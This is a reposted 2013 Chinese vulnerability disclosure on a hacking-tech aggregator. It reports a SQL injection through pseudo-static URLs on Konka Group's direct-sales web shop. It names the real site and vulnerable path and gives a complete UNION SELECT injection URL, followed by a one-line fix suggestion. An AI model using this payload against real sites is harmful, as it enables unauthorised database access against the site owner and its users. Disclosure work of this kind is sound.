记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

康佳集团直销商城伪静态sql注入

2013-09-08 13:45
存在伪静态注入,能够获取数据库信息。
 
http://www.led-konka.com/pro_cat/55.shtml
 
存在伪静态sql注入
 
在/pro_cat/55后可以直接写入注入语句,并返回数据库处理结果
 
 
http://www.led-konka.com/pro_cat/55%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x716b777a71,0x567841674e76744a4149,0x7174716a71),NULL,NULL,NULL--%20.shtml
 
 

 
 
修复方案:

过滤敏感字符,或者禁止注入语句的写入。 
 


知识来源: www.2cto.com/Article/201309/242108.html

阅读:89225 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“康佳集团直销商城伪静态sql注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云